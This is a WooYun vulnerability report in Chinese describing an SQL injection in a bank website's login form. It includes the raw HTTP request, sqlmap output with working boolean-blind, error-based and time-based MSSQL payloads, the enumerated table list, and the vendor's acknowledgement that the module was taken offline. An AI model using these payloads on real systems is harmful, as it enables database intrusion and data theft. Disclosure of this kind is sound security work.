乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-25: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经确认,细节仅向厂商公开 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
http://www.cdb.com.cn
主站存在SQL注入
POST /website/cdb/bbs/usercheck.asp HTTP/1.1Content-Length: 234Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDSQBDBSRA=BBDDKCJALMLLJDBECHGDEPIJHost: www.cdb.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*password=g00dPa%24%24w0rD&Submit422=%b5%c7%20%c2%bc&uname=1
uname参数
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: uname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(106)+CHAR(122)+CHAR(50)+CHAR(55)+CHAR(67)+CHAR(83)+CHAR(110)) FROM syscolumns)+'' AND 8306=8306 AND 'pVNl'='pVNl Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname=-7710' OR 9487=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9487=9487) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(117)+CHAR(113))) AND 'dRLV'='dRLV Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: password=g00dPa$$w0rD&Submit422=%b5%c7 %c2%bc&uname=-5297' OR 5114=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UXZu'='UXZu---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005Database: cdb[28 tables]+----------------------+| TabAd || TabAdPosition || TabAttrContent || TabColumn || TabCounter || TabExtAttr || TabHomeModule || TabInfoBack || TabManager || TabMember || TabNews || TabOutPro || TabPositionType || TabPushWin || TabTemplate || TabUpFile || TabVote || TabWebInfo || VIEWNews || ViewAd || ViewAdPosition || Web_Ip_address || Web_Stat_Client || Web_Stat_Origin_Page || Web_Stat_Site || Web_Stat_View || dtproperties || test |+----------------------+
银行网站就不深入了~
危害等级:中
漏洞Rank:9
确认时间:2015-06-25 14:35
感谢漏洞发现,已协调业务管理、开发、运维相关人员尽快分析解决问题,初步分析表明,产生漏洞的模块并无实际用途,将尽快下线该模块。
2015-06-25:相关模块已经下线。